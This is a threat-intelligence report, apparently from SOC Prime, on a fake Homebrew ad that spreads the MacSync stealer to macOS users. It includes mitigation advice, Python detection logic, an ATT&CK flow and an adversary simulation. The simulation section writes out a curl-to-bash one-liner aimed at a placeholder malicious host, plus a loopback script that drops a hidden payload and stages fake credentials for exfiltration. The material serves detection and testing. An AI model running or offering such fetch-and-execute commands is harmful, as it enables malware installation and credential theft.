SOC Prime Bias: Medium

05 May 2026 17:17

Fake Homebrew Ad Leads to MacSync Stealer Infection

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

Attackers are using malicious search ads to direct users to a fake Homebrew website that targets macOS systems with the MacSync Stealer. The spoofed page instructs victims to copy and run a shell command that downloads and launches the malware. Once active, the stealer gathers credentials and system details, compresses the stolen data into a ZIP archive, and sends it to a command-and-control server. The campaign highlights the growing use of malvertising to compromise macOS users.

Investigation

The analyst traced the attack from the malicious ad to an impersonated Homebrew page hosted on Google Sites. That page presented a zsh command which, when executed, downloaded additional scripts from attacker-controlled infrastructure and created a temporary ZIP archive containing collected data. Network traffic confirmed that the archive was exfiltrated to the domain glowmedaesthetics.com. Researchers documented the relevant indicators, including URLs, domains, and file paths tied to the infection chain.

Mitigation

Users should avoid copying and running commands from untrusted websites and should verify the legitimacy of package manager pages before interacting with them: Homebrew's official site is brew.sh and its installer is published in the Homebrew/install GitHub repository, so a Google Sites page offering a Homebrew install command is a red flag. Downloading an install script to a file and reading it before executing it is safer than piping curl straight into a shell. Ad-blocking or security-focused browser extensions can help reduce exposure to malicious sponsored links. On macOS, Gatekeeper should remain enabled and application execution should be limited to trusted, signed software, with the caveat that Gatekeeper only evaluates files carrying the quarantine attribute (such as browser downloads); a script fetched with curl and piped into a shell never receives that attribute and runs without any Gatekeeper check, so Gatekeeper alone does not stop this lure. Defenders should also monitor outbound traffic for connections to unfamiliar domains.

Response

Security teams should detect execution of the suspicious zsh command and any curl activity reaching the identified malicious URL. Alerts should also be generated for creation of the /tmp/osalogging.zip archive and for outbound traffic to glowmedaesthetics.com. If infection is suspected, isolate the affected system, collect forensic evidence, and reset any compromised credentials.
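As an added example, not part of the SOC Prime report or its rule content: the three checks in the Response section implemented as simple detection logic over constructed macOS endpoint telemetry, then correlated per host. The event field names (type, cmdline, path, dest_host) are an assumption standing in for whatever an EDR or Endpoint Security sensor emits, and the Google Sites URL on host mac-01 is made up, since the report does not reproduce the lure URL. The second host runs the genuine Homebrew installer, which is itself a curl-inside-a-shell one-liner, to show why the generic curl-to-shell match is only a triage signal while the archive path and C2 domain carry the verdict.

```python
"""Added detection example for the Response section above; this is not SOC
Prime's rule content or the report's own code. It runs the report's three
indicators (a curl-to-shell command line, creation of /tmp/osalogging.zip,
and a connection to glowmedaesthetics.com) over constructed endpoint
telemetry and collapses the hits into a per-host verdict."""
import re
from collections import defaultdict

# Indicators stated in the report.
C2_DOMAIN = "glowmedaesthetics.com"
STAGING_ARCHIVE = "/tmp/osalogging.zip"

# The lure's "fetch and run" shape: curl piped into a shell, or curl inside a
# command substitution handed to `sh -c`. This is deliberately broad (the
# genuine Homebrew installer has the second shape), so on its own it is only
# a triage signal; the archive path and the C2 domain carry the verdict.
CURL_TO_SHELL = re.compile(
    r"\bcurl\b[^|]*\|\s*(?:/bin/)?(?:bash|zsh|sh)\b"   # curl ... | zsh
    r"|\b(?:bash|zsh|sh)\b[^$]*\$\(\s*curl\b"          # bash -c "$(curl ...)"
)

# Constructed sample telemetry (not real logs). Field names are an assumption
# standing in for an EDR / Endpoint Security event schema. mac-01 replays the
# reported chain (the Google Sites URL is made up; the report does not
# reproduce the lure URL). mac-02 is a legitimate Homebrew install.
SAMPLE_EVENTS = [
    {"host": "mac-01", "ts": 1, "type": "process", "user": "alice",
     "cmdline": "/bin/zsh -c 'curl -fsSL https://sites.google.com/view/brew-example/s | zsh'"},
    {"host": "mac-01", "ts": 3, "type": "file", "action": "create",
     "path": "/tmp/osalogging.zip", "process": "zsh"},
    {"host": "mac-01", "ts": 4, "type": "network", "process": "curl",
     "dest_host": "glowmedaesthetics.com", "dest_port": 443},
    {"host": "mac-02", "ts": 5, "type": "process", "user": "bob",
     "cmdline": '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'},
    {"host": "mac-02", "ts": 6, "type": "file", "action": "create",
     "path": "/tmp/build-artifacts.zip", "process": "zip"},
]


def match_event(ev):
    """Return the name of the rule an event triggers, or None."""
    kind = ev.get("type")
    if kind == "process" and CURL_TO_SHELL.search(ev.get("cmdline", "")):
        return "curl_to_shell"
    if kind == "file" and ev.get("action") == "create" and ev.get("path") == STAGING_ARCHIVE:
        return "osalogging_zip_created"
    if kind == "network" and ev.get("dest_host", "").lower().rstrip(".") == C2_DOMAIN:
        return "c2_connection"
    return None


def detect(events):
    """Run every event through the rules; return (host, ts, rule) hits in order."""
    hits = []
    for ev in events:
        rule = match_event(ev)
        if rule:
            hits.append((ev["host"], ev["ts"], rule))
    return hits


def correlate(hits):
    """Collapse hits per host: staging archive or C2 traffic means compromise;
    a lone curl-to-shell execution is queued for analyst review of the URL."""
    rules_by_host = defaultdict(set)
    for host, _ts, rule in hits:
        rules_by_host[host].add(rule)
    verdicts = {}
    for host, rules in rules_by_host.items():
        if rules & {"osalogging_zip_created", "c2_connection"}:
            verdicts[host] = "compromised"
        elif "curl_to_shell" in rules:
            verdicts[host] = "review"
    return verdicts


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for hit in found:
        print("hit:", hit)
    print("verdicts:", correlate(found))
```

Running it flags both hosts on the curl-to-shell rule but only mac-01 reaches a "compromised" verdict, because only it creates /tmp/osalogging.zip and talks to the C2 domain; mac-02 is left for an analyst to confirm that the URL in the command line is the official installer. The domain comparison lowercases and strips a trailing dot so that DNS-style records still match.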

Attack Flow

    graph TB
        %% Class Definitions
        classDef technique fill:#99ccff
        %% Node definitions
        initial_malicious_link["<b>Technique</b> – <b>T1204.001 Malicious Link</b><br/><b>Description</b>: Victim clicks a malicious URL in an ad and is directed to a counterfeit Homebrew download page."]
        class initial_malicious_link technique
        user_copy_paste["<b>Technique</b> – <b>T1204.004 Malicious Copy and Paste</b><br/><b>Description</b>: Victim copies a crafted script from the webpage and pastes it into the Terminal, executing attacker code."]
        class user_copy_paste technique
        unix_shell["<b>Technique</b> – <b>T1059.004 Unix Shell</b><br/><b>Description</b>: Zsh script runs, downloading additional payload from glowmedaesthetics.com."]
        class unix_shell technique
        gui_input_capture["<b>Technique</b> – <b>T1056.002 GUI Input Capture</b><br/><b>Description</b>: Fake graphical password prompt captures the macOS user password."]
        class gui_input_capture technique
        local_data_staging["<b>Technique</b> – <b>T1074.001 Local Data Staging</b><br/><b>Description</b>: System information and logs are archived into /tmp/osalogging.zip for later exfiltration."]
        class local_data_staging technique
        exfiltration_c2["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/><b>Description</b>: The zip file is sent to the attacker's C2 server over HTTPS."]
        class exfiltration_c2 technique
        gather_software_info["<b>Technique</b> – <b>T1518 Software Discovery</b><br/><b>Description</b>: Script enumerates installed software to build an inventory of the victim host."]
        class gather_software_info technique
        data_local_system["<b>Technique</b> – <b>T1005 Data from Local System</b><br/><b>Description</b>: Reads additional local files to include in the exfiltrated archive."]
        class data_local_system technique
        %% Connections
        initial_malicious_link -->|leads_to| user_copy_paste
        user_copy_paste -->|leads_to| unix_shell
        unix_shell -->|leads_to| gui_input_capture
        gui_input_capture -->|leads_to| local_data_staging
        local_data_staging -->|leads_to| exfiltration_c2
        local_data_staging -->|also leads_to| gather_software_info
        local_data_staging -->|also leads_to| data_local_system

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Initial Lure: The victim searches for Homebrew, clicks a sponsored search result, and lands on a counterfeit Homebrew install page that presents a malicious installation command.

    2. Execution: The victim copies the one-liner from the page and pastes it into their terminal:

      curl -fsSL https://malicious.example.com/macsyncloader.sh | /bin/bash
      • The curl binary is invoked with a remote URL and its output is piped straight into a shell (matches the rule). The hostname is a placeholder; the campaign's real URL is not reproduced here.
    3. Downloader Script (macsyncloader.sh):

      • Downloads the MacSync payload via curl.
      • Writes the payload to /tmp/.macsync and executes it.
      • Pops up a credential-stealing password prompt (in the real chain via osascript on macOS; the simulation simply echoes).
      • Collects host information and stages it in /tmp/osalogging.zip, the archive path observed in the report, ahead of exfiltration.
    4. Persistence: A real stealer may register a LaunchAgent to run at login. This is outside the scope of the current rule, and the regression script deliberately creates no persistence, so cleanup only has to remove files.

  • Regression Test Script: The following Bash script reproduces the steps above against a loopback web server, so that curl genuinely fetches a remote script and pipes it into a shell (the telemetry the detection logic expects) while no attacker host is ever contacted. Curling the placeholder hostname directly would fail to resolve and abort the script under set -e before any telemetry was produced.

    #!/usr/bin/env bash
    set -euo pipefail
    
    # -------------------------------------------------
    # Simulated attacker-controlled script host
    # -------------------------------------------------
    # The real loader was served from attacker infrastructure. The test
    # serves it from a loopback HTTP server instead, so curl performs a
    # real network fetch without touching any external host.
    # Requires python3 (present on macOS with the Xcode command line tools).
    WORKDIR="$(mktemp -d)"
    PORT=8787
    MALICIOUS_HOST="http://127.0.0.1:${PORT}"
    LOADER="${MALICIOUS_HOST}/macsyncloader.sh"
    
    # -------------------------------------------------
    # Step 0: Write the loader that the "attacker" will serve
    # -------------------------------------------------
    # Mirrors the observed chain: drop a hidden payload in /tmp, run it,
    # and stage the loot in the same archive path the stealer used.
    cat <<'LOADER_SH' > "${WORKDIR}/macsyncloader.sh"
    #!/bin/bash
    cat <<'PAYLOAD' > /tmp/.macsync
    #!/usr/bin/env bash
    echo "MacSync payload executed - simulating host info collection..."
    # Simulated credential grab (no real data)
    echo "Collected credentials: user@example.com / password123" > /tmp/.macsync_loot.txt
    rm -f /tmp/osalogging.zip
    python3 -m zipfile -c /tmp/osalogging.zip /tmp/.macsync_loot.txt
    PAYLOAD
    chmod +x /tmp/.macsync
    /tmp/.macsync
    LOADER_SH
    
    # -------------------------------------------------
    # Step 1: Start the loopback web server; tear it down on exit
    # -------------------------------------------------
    python3 -m http.server --bind 127.0.0.1 --directory "$WORKDIR" "$PORT" >/dev/null 2>&1 &
    SERVER_PID=$!
    trap 'kill "$SERVER_PID" 2>/dev/null || true; rm -rf "$WORKDIR"' EXIT
    sleep 1
    
    # -------------------------------------------------
    # Step 2: Download and execute the malicious loader (the detected step)
    # -------------------------------------------------
    echo "[*] Triggering detection rule by invoking curl ..."
    curl -fsSL "$LOADER" | /bin/bash
    
    # Confirm the artifacts the detection logic keys on were created
    ls -l /tmp/.macsync /tmp/osalogging.zip
    echo "[*] Simulation complete."
  • Cleanup Commands: Remove any files the simulation left in /tmp.

    #!/usr/bin/env bash
    set -euo pipefail
    
    echo "[*] Cleaning up simulation artifacts ..."
    rm -f /tmp/.macsync /tmp/.macsync_loot.txt /tmp/osalogging.zip
    # No LaunchAgent or other persistence is created by this test
    echo "[*] Cleanup finished."